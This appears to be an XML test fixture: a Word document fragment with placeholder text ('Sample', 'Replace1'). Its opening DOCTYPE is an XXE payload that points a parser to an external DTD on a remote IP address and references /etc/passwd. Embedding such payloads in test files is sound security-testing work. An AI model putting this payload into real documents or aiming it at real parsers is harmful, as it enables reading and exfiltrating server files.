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!DOCTYPE roottag
  PUBLIC '-//OXML/XXE/EN'
  'http://146.185.129.224:8080/a.dtd//etc/passwd'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6A3" w:rsidRDefault="00CB06A3">
      <w:r>
        <w:t>Sample</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB06A3" w:rsidRDefault="00CB06A3">
      <w:r w:rsidRPr="00CB06A3">
        <w:t>§</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Replace1</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00CB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6B"/>
    <w:rsid w:val="0018236B"/>
    <w:rsid w:val="00CB06A3"/>
    <w:rsid w:val="00F0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2015-02-27T15:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-02-27T15:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>